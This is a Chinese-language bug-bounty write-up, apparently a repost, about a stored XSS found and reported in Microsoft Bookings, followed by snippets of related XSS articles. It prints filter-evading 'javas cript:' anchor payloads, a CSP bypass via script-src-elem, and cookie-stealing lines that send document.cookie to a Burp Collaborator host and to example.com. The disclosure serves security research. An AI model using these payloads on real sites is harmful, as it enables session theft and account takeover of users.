记一次Microsoft服务预订中的存储型XSS漏洞挖掘

VSole2023-01-06 11:43:23

一个美好的一天,我在我的办公室工作,我收到了同事的日历邀请。在查看电子邮件时,我发现了 Microsoft 的新服务预订(实际上是旧的,但对我来说是新的)。Microsoft booking 允许任何人预订服务/日历时段。

此应用程序有两个界面,一个是内部界面,另一个是面向公众的服务页面。我决定深入检查这个应用程序。我去内部预订页面开始新的预订,而预订服务发现了一个参数消息/注释。

我尝试插入各种 XSS payload 来触发 xss 但没有成功。

经分析,发现应用程序允许用户插入链接或 标签。

现在我的注意力转移到了这个标签上。我使用谷歌为我的攻击向量找到了完美的有效载荷,我发现可以使用 href 值利用 ancher 标签。

应用程序有各种保护机制来防止脚本的执行。但是当我将 javascript word 分解为 javas cript 应用程序时,它接受了这个payload。

现在,当用户单击预订消息中提供的链接时,此payload将被执行。我非常兴奋。

<a href="javas   cript:alert('document.domain')">XSSa>

但是当我将payload更新为

<a href=”javas cript:alert(document.cookie)” >Testing.com a>

我收到带有 cookie 未定义消息的弹出消息,这意味着应用程序具有 csp 保护。

所以我们更新了我们的有效负载以绕过 csp 保护。注入使用script-src-elemCSP 中的指令。该指令允许您仅定位script元素。使用此指令,您可以覆盖现有script-src规则,使您能够注入unsafe-inline,从而允许您使用内联脚本。

<a href=”javas cript:alert(document.cookie)”&token=;script-src-elem%20%27unsafe-inline%27 >Testing.com a>

令我惊讶的是,我能够使用 xss 获取 cookie。现在我想将这些 cookie 传递到我的服务器。所以我启动了 burp collaborator 并将payload更新为

document
.location=’http://l4q4dgmomxzkw6i13q5essmojfp6hu6.burpcollaborator.net/cookiestealer.php?c='+document.cookie"&token=;script-src-elem%20%27unsafe-inline%27 >Testing.com 

在这里,我在一个标签中使用了 document.location,该标签将用户重定向到另一个页面并共享 cookie。

现在我想提交此错误,但由于我是来自同一组织的经过身份验证的用户,因此影响很小。

因此,我尝试从公开的服务发起相同的攻击,并且无需身份验证即可执行相同的攻击。

现在,由于我是未经身份验证的用户/攻击者,严重性从低/中到高。

我很快将这个错误提交给微软团队,微软的人很快就解决了这个问题,是的,他们因为这个漏洞奖励了我几千美金的漏洞赏金。

感谢 Microsoft 安全团队在修复此问题期间提供的大力帮助。

漏洞挖掘xss
本作品采用《CC 协议》,转载必须注明作者和本文链接
跨站脚本英文全称(Cross Site Scripting跨站脚本),为了不和css层叠样式表(英文全称:Cascading Style Sheets)混淆,因此将跨站脚本缩写为XSS。本期我们讲解一下XSS漏洞原理和利用检测。
ezXSS介绍ezXSS是一款用于渗透测试和漏洞挖掘XSS盲测跨站脚本工具。在演示版本中可能禁用了一些特性。
但当存在存储型XSS时,受害者打开此URL,攻击代码将会被触发,这种情况下便称之为存储型XSS漏洞。在标题处和帖子内容中分别填写payload,填写好之后,应与下图一致填写好内容之后,点击下方的发表按钮,即可进行发帖,发帖成功会弹出一个提示成功,如下图所示?????
xsshelp闲着没事随便写的一个辅助挖掘xss漏洞的工具xsshelp version: 1.0.0Usage: [-ut] [-u url] [-t thread] [-h help]Options: -h this help -t intthread Num -u string a target url
我发现了一个存储的XSS漏洞,我可以通过窃取cookie升级为帐户接管。我的payload目前需要最少的用户交互,只需单击即可。之后,向下滚动并单击取消预约。确保您拦截了此请求。使用以下有效载荷添加消息:"><xss/id="1"/tabindex="1"/onfocusin="window.location.href='https://example.com?cookie='%2bdocument.cookie">您通常会收到一个确认框,确认您的预约已取消,单击确定。即使管理员注销,此cookie也可以轻松重用。这是因为cookie不会过期。影响我能够通过取消我们的预约并包含一条消息来接管一个管理员帐户。这意味着我们必须找到一个具有用户交互的。
在查看电子邮件时,我发现了 Microsoft 的新服务预订。Microsoft booking 允许任何人预订服务/日历时段。此应用程序有两个界面,一个是内部界面,另一个是面向公众的服务页面。我决定深入检查这个应用程序。我尝试插入各种 XSS payload 来触发 xss 但没有成功。现在我的注意力转移到了这个标签上。应用程序有各种保护机制来防止脚本的执行。
在这篇文章中,我将讨论 Microsoft Forms 中反射式跨站点脚本 漏洞的详细信息。它允许用户创建表单和调查,与他人共享,并在集中位置收集响应。但是,我们发现可以将恶意JavaScript代码注入表单中,这些代码可以由毫无戒心的用户执行。我遵循了 MSRC 报告漏洞的准则并提交了我的发现。欲了解更多信息,请参阅:向 MSRC 提交报告的示例 https://www.microsoft.com/en-us/msrc/bounty-example-report-submission微软赏金计划 |微软公司 https://www.microsoft.com/en-us/msrc/bounty?
每个黑客都会遇到这个,第一个赏金。我实际上无法解释它的感觉,但我知道你们中的大多数人都能理解它的感觉。当我们开始在 Web 应用程序安全中进行漏洞赏金时,我们大多数人都会从 XSS开始,故事从这里开始。
记一次NFT平台的存储型XSS和IDOR漏洞这是我在 NFT 市场中发现的一个令人兴奋的安全问题,它允许我通过链接 IDOR 和 XSS 来接管任何人的帐户,以实现完整的帐户接管漏洞。我们能够用我们自己的价值观修改受害者用户的个人资料。现在我们可以提出任何其他请求来执行其他经过身份验证的操作,例如出售艺术品或转让或删除用户的艺术品漏洞披露
大家好,在本文中,我将分享我在2个TikTok资产发现的XSS漏洞。当我决定在TikTok 程序中寻找漏洞 时,我花了1个月的时间寻找这个XSS。当我在TikTok 卖家账户上创建产品时,这个 XSS 发现开始了我在卖家账户的产品名称中插入了 XSS payload。
VSole
网络安全专家